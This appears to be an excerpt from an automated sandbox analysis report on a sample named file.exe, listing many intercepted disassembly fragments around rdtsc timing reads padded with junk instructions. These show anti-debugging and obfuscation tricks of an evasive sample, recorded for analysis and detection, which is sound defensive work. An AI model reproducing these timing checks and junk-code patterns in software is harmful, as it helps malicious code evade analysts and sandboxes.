Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B12F6F second address: B12F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B12F75 second address: B12F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F79A547B38Eh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B13132 second address: B13148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F79A4C9A8EFh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B13148 second address: B1314D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B13A01 second address: B13A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F79A4C9A8E6h 0x0000000a pop edi 0x0000000b jnc 00007F79A4C9A8FAh 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F79A4C9A8F2h 0x00000018 pop ebx 0x00000019 pushad 0x0000001a jmp 00007F79A4C9A8F5h 0x0000001f pushad 0x00000020 jl 00007F79A4C9A8E6h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B13A46 second address: B13A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B13E56 second address: B13E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F79A4C9A8F4h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B13E71 second address: B13E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A547B394h 0x00000009 jmp 00007F79A547B393h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B13FFD second address: B1402A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jbe 00007F79A4C9A900h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B08BBA second address: B08BFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B392h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F79A547B38Bh 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F79A547B397h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B08BFB second address: B08C0A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F79A4C9A8E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B146F1 second address: B146F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B146F6 second address: B146FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B17D57 second address: B17D6D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F79A547B38Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B18E57 second address: B18E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B18E5B second address: B18E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F79A547B392h 0x00000010 pushad 0x00000011 jmp 00007F79A547B399h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B18E93 second address: B18E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B18E98 second address: B18EAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B38Dh 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B1EB53 second address: B1EB5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jng 00007F79A4C9A8E6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B1EB5F second address: B1EB63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B1EB63 second address: B1EB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B1EDE7 second address: B1EDF3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jc 00007F79A547B386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B1EDF3 second address: B1EE1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F79A4C9A8E8h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B1F225 second address: B1F234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A547B38Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B1F234 second address: B1F295 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F79A4C9A8E6h 0x00000008 jmp 00007F79A4C9A8F7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F79A4C9A8EBh 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 pop eax 0x00000019 jmp 00007F79A4C9A8F4h 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jp 00007F79A4C9A8FBh 0x00000029 jmp 00007F79A4C9A8EFh 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B1F295 second address: B1F299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B1F299 second address: B1F29E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B1F29E second address: B1F2A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B1F2A4 second address: B1F2AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B1F456 second address: B1F466 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F79A547B386h 0x00000008 jbe 00007F79A547B386h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B1F466 second address: B1F4B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F79A4C9A8F9h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d jmp 00007F79A4C9A8F3h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jp 00007F79A4C9A90Ch 0x0000001a push eax 0x0000001b pushad 0x0000001c popad 0x0000001d pop eax 0x0000001e pushad 0x0000001f jmp 00007F79A4C9A8EDh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B22E72 second address: B22E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B234EF second address: B234FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B24A02 second address: B24A14 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2707C second address: B27083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27083 second address: B27088 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27A58 second address: B27A5D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2B50F second address: B2B513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B28159 second address: B2815D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CA15 second address: B2CA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F79A547B386h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F79A547B395h 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F0F2 second address: B2F0F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F0F8 second address: B2F0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3011B second address: B3011F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3011F second address: B30125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F37A second address: B2F37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30326 second address: B3032A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3032A second address: B303DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F79A4C9A8F8h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F79A4C9A8E8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 jmp 00007F79A4C9A8EDh 0x0000002e mov dword ptr [ebp+122D1CAAh], esi 0x00000034 push dword ptr fs:[00000000h] 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007F79A4C9A8E8h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 00000018h 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 mov dword ptr [ebp+1245B0A0h], edx 0x0000005b mov dword ptr fs:[00000000h], esp 0x00000062 movsx edi, ax 0x00000065 mov eax, dword ptr [ebp+122D09CDh] 0x0000006b push FFFFFFFFh 0x0000006d mov edi, 193D429Ch 0x00000072 nop 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007F79A4C9A8F9h 0x0000007b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B321D3 second address: B321EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B395h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B321EC second address: B321FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A4C9A8EDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B32463 second address: B32467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B340B4 second address: B340CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34298 second address: B342AF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F79A547B388h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F79A547B388h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3435B second address: B34379 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F79A4C9A8EDh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c js 00007F79A4C9A8F4h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B37315 second address: B3732C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F79A547B388h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F79A547B388h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B354AD second address: B354B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B37601 second address: B37606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B38394 second address: B3839E instructions: 0x00000000 rdtsc 0x00000002 je 00007F79A4C9A8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B385C8 second address: B385CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B385CC second address: B385D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A49B second address: B3A4B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F79A547B38Ch 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B385D1 second address: B385D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A4B5 second address: B3A4BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B38696 second address: B386AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79A4C9A8F3h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3B46B second address: B3B46F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A661 second address: B3A665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3B46F second address: B3B48E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c jg 00007F79A547B38Ch 0x00000012 push eax 0x00000013 pushad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A665 second address: B3A681 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jns 00007F79A4C9A904h 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3C413 second address: B3C418 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3B5AB second address: B3B5B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3B5B1 second address: B3B5B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3C559 second address: B3C55F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3C55F second address: B3C563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4095E second address: B40964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40964 second address: B40975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79A547B38Ah 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45EAC second address: B45EBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A4C9A8EAh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45EBA second address: B45EC8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F79A547B386h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46182 second address: B46195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A4C9A8EFh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4ADB3 second address: B4ADB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4ADB8 second address: B4ADBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AF39 second address: B4AF3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AF3F second address: B4AF81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F79A4C9A8EFh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jmp 00007F79A4C9A8EBh 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push ebx 0x0000001e jmp 00007F79A4C9A8ECh 0x00000023 pop ebx 0x00000024 mov eax, dword ptr [eax] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AF81 second address: B4AF87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AF87 second address: B4AF8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AF8C second address: B4AF92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AF92 second address: B4AF96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AF96 second address: B4AFA9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AFA9 second address: B4AFAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AFAE second address: B4AFB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4B0AA second address: B4B0D8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a jnl 00007F79A4C9A8E6h 0x00000010 pop edi 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jng 00007F79A4C9A8ECh 0x00000020 pushad 0x00000021 push edi 0x00000022 pop edi 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push edi 0x0000002d pop edi 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4B0D8 second address: B4B0DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4B0DC second address: B4B0E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4B0E2 second address: 96EB39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B38Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jp 00007F79A547B390h 0x00000013 pop eax 0x00000014 cmc 0x00000015 push dword ptr [ebp+122D0A9Dh] 0x0000001b pushad 0x0000001c jmp 00007F79A547B394h 0x00000021 movsx ecx, dx 0x00000024 popad 0x00000025 call dword ptr [ebp+122D1FBAh] 0x0000002b pushad 0x0000002c pushad 0x0000002d mov dword ptr [ebp+122D1CA1h], ecx 0x00000033 jno 00007F79A547B38Bh 0x00000039 popad 0x0000003a xor eax, eax 0x0000003c jmp 00007F79A547B396h 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 mov dword ptr [ebp+122D1CA1h], edx 0x0000004b mov dword ptr [ebp+122D2E11h], eax 0x00000051 jmp 00007F79A547B38Dh 0x00000056 mov esi, 0000003Ch 0x0000005b ja 00007F79A547B390h 0x00000061 pushad 0x00000062 mov dl, ah 0x00000064 mov ebx, dword ptr [ebp+122D2D1Dh] 0x0000006a popad 